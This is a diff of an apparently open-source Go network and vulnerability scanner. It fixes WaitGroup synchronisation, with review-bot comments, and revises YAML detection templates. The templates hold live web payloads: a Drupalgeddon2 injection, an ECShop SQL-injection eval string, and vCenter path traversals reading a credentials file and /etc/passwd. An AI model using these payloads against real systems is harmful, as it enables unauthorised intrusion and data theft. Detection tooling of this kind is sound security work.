diff --git a/Plugins/portscan.go b/Plugins/portscan.go
index 34330b4..1b53338 100644
--- a/Plugins/portscan.go
+++ b/Plugins/portscan.go
@@ -26,6 +26,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 go func() {
 for found := range results {
 AliveAddress = append(AliveAddress, found)
+ wg.Done()
 }
 }()
 
@@ -33,7 +34,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 for i := 0; i < workers; i++ {
 go func() {
 for addr := range Addrs {
- PortConnect(addr, results, timeout)
+ PortConnect(addr, results, timeout, &wg)
 wg.Done()
 }
 }()
@@ -42,18 +43,17 @@ func PortScan(hostslist []string, ports string, timeout int64) []string {
 //添加扫描目标
 for _, port := range probePorts {
 for _, host := range hostslist {
- Addrs <- Addr{host, port}
 wg.Add(1)
+ Addrs <- Addr{host, port}
 }
 }
-
 wg.Wait()
 close(Addrs)
 close(results)
 return AliveAddress
 }
 
-func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64) {
+func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
 host, port := addr.ip, addr.port
 con, err := net.DialTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
 if err == nil {
@@ -62,5 +62,6 @@ func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64
 result := fmt.Sprintf("%s open", address)
 common.LogSuccess(result)
 respondingHosts <- address
+ wg.Add(1)
 }
 }
diff --git a/Plugins/scanner.go b/Plugins/scanner.go
index 3bd9fed..48faa69 100644
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -9,7 +9,6 @@ import (
 "strconv"
 "strings"
 "sync"
- "time"
 )
 
 func Scan(info common.HostInfo) {
@@ -65,7 +64,7 @@ func Scan(info common.HostInfo) {
 }
 }
 wg.Wait()
- time.Sleep(100 * time.Millisecond)
+ common.Logwg.Wait()
 close(common.Results)
 fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
 }
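Review bot: In the last portscan.go hunk the new `wg.Add(1)` comes after `respondingHosts <- address`, while the receiver goroutine added in the first hunk calls `wg.Done()` as soon as it has appended the address, so that Done can consume the single count the producer loop registered for this target before PortConnect's own Add runs. When that target is the last one outstanding the counter reaches zero while the main goroutine is already blocked in `wg.Wait()`, and the late `wg.Add(1)` then races the Wait, which sync.WaitGroup treats as misuse (it may panic) and which lets `close(results)` run before PortConnect has finished. Registering the count before the result can be consumed closes the window: `wg.Add(1)` followed by `respondingHosts <- address`. PortScan's body starts outside these hunks, but the hunk headers show `wg` is the WaitGroup it waits on.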
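Review bot: The new `common.Logwg.Wait()` in scanner.go replaces a fixed sleep with a WaitGroup owned by another package, and the line gives no hint why it must precede `close(common.Results)`; suggest `// block until SaveLog has written every result queued by LogSuccess, then close its channel`. The Wait only terminates if every `Logwg.Add(1)` in common.LogSuccess is matched by a `Logwg.Done()` in common.SaveLog, which from the log.go hunks appears to hold only while the SaveLog goroutine is running; if LogSuccess can queue a result without SaveLog having been started, this line hangs where the old sleep merely risked truncated output, so that path is worth confirming against the part of LogSuccess not shown here. Scan's body starts outside this hunk.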
@@ -78,10 +77,8 @@ func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.W Mutex.Lock() common.Num += 1 Mutex.Unlock() - ScanFunc(PluginList, scantype, &info) wg.Done() - Mutex.Lock() common.End += 1 Mutex.Unlock() diff --git a/README.md b/README.md index 4206e45..052180a 100644 --- a/README.md +++ b/README.md @@ -143,6 +143,14 @@ https://github.com/hack2fun/Gscan https://github.com/k8gege/LadonGo https://github.com/jjf012/gopoc +# 404StarLink 2.0 - Galaxy +![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png) + +fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环,如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。 + +- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community) + + ## 最近更新 [+] 2021/4/21 加入netbios探测、域控识别 [+] 2021/3/4 支持-u url或者-uf url.txt,对url进行批量扫描 diff --git a/WebScan/pocs/drupal-cve-2018-7600-rce.yml b/WebScan/pocs/drupal-cve-2018-7600-rce.yml index 5697049..22cdad0 100644 --- a/WebScan/pocs/drupal-cve-2018-7600-rce.yml +++ b/WebScan/pocs/drupal-cve-2018-7600-rce.yml 
@@ -2,35 +2,15 @@ name: poc-yaml-drupal-cve-2018-7600-rce set: r1: randomLowercase(4) r2: randomLowercase(4) -groups: - drupal8: - - method: POST - path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) - drupal7: - - method: POST - path: "/?q=user/password&name[%23post_render][]=printf&name[%23type]=markup&name[%23markup]={{r1}}%25%25{{r2}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_id=user_pass&_triggering_element_name=name&_triggering_element_value=&opz=E-mail+new+Password - search: | - name="form_build_id"\s+value="(?P.+?)" - expression: | - response.status == 200 - - method: POST - path: "/?q=file%2Fajax%2Fname%2F%23value%2F{{build_id}}" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - form_build_id={{build_id}} - expression: | - response.body.bcontains(bytes(r1 + "%" + r2)) +rules: + - method: POST + path: "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=printf&mail[#type]=markup&mail[#markup]={{r1}}%25%25{{r2}} + expression: | + response.body.bcontains(bytes(r1 + "%" + r2)) detail: links: - https://github.com/dreadlocked/Drupalgeddon2 diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml index acaa0a0..bb9151c 100644 --- a/WebScan/pocs/ecshop-rce.yml +++ b/WebScan/pocs/ecshop-rce.yml 
@@ -2,25 +2,15 @@ name: poc-yaml-ecshop-rce set: r1: randomInt(40000, 44800) r2: randomInt(40000, 44800) -groups: - 2.x: - - method: POST - path: /user.php - headers: - Referer: >- - 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) - 3.x: - - method: POST - path: /user.php - headers: - Referer: >- - 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) +rules: + - method: POST + path: /user.php + headers: + Referer: >- + 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca + Content-Type: application/x-www-form-urlencoded + body: action=login&pp123=printf({{r1}}*{{r2}}); + expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) detail: author: 凉风(http://webkiller.cn/) links: 
diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml index 36d9752..041832d 100644 --- a/WebScan/pocs/jumpserver-unauth-rce.yml +++ b/WebScan/pocs/jumpserver-unauth-rce.yml @@ -1,29 +1,17 @@ name: poc-yaml-jumpserver-unauth-rce set: r1: randomLowercase(5) -groups: - users: - - method: GET - path: /api/v1/users/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/users/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") - authentication: - - method: GET - path: /api/v1/authentication/connection-token/ - follow_redirects: false - expression: | - response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") - - method: GET - path: /api/v1/authentication/connection-token/?user-only={{r1}} - follow_redirects: false - expression: | - response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") +rules: + - method: GET + path: /api/v1/authentication/connection-token/ + follow_redirects: false + expression: | + response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated") + - method: GET + path: /api/v1/authentication/connection-token/?user-only={{r1}} + follow_redirects: false + expression: | + response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"") detail: author: mvhz81 info: jumpserver unauth read logfile + jumpserver rce diff --git a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml index 74a9f70..6aa046e 100644 
--- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml +++ b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml @@ -4,7 +4,7 @@ rules: path: /login.php follow_redirects: false expression: | - response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && response.body.bcontains(b"password") + response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) detail: author: jweny(https://github.com/jweny) links: diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml index 582ee48..5ddda4f 100644 --- a/WebScan/pocs/springboot-env-unauth.yml +++ b/WebScan/pocs/springboot-env-unauth.yml @@ -1,15 +1,9 @@ name: poc-yaml-springboot-env-unauth -groups: - spring1: - - method: GET - path: /env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") - spring2: - - method: GET - path: /actuator/env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") +rules: + - method: GET + path: /env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") detail: links: - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml index d831b24..a32c5c2 100644 --- a/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml +++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read.yml 
@@ -1,17 +1,10 @@ name: poc-yaml-vmware-vcenter-arbitrary-file-read -groups: - win: - - method: GET - path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") - linux: - - method: GET - path: /eam/vib?id=/etc/passwd - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +rules: + - method: GET + path: /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"org.postgresql.Driver") detail: author: MrP01ntSun(https://github.com/MrPointSun) links: diff --git a/common/log.go b/common/log.go index 47f53bc..44cf509 100644 --- a/common/log.go +++ b/common/log.go @@ -4,6 +4,7 @@ import ( "fmt" "os" "strings" + "sync" "time" ) @@ -14,8 +15,10 @@ var Start = true var LogSucTime int64 var LogErrTime int64 var WaitTime int64 +var Logwg sync.WaitGroup func LogSuccess(result string) { + Logwg.Add(1) LogSucTime = time.Now().Unix() if Start { go SaveLog() @@ -30,6 +33,7 @@ func SaveLog() { if IsSave { WriteFile(result, Outputfile) } + Logwg.Done() } }
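Review bot: `Logwg` in the second log.go hunk is a new exported package-level name with no doc comment; suggest `// Logwg counts results handed to LogSuccess that SaveLog has not yet written; Scan waits on it before closing Results.` above the declaration. The pairing depends on SaveLog consuming every result that LogSuccess enqueues after `Logwg.Add(1)`; the enqueue itself is outside the hunk, so confirm there is no return path between the Add and the send, since such a path would leave the counter permanently positive and block every waiter. Both LogSuccess and SaveLog continue outside these hunks.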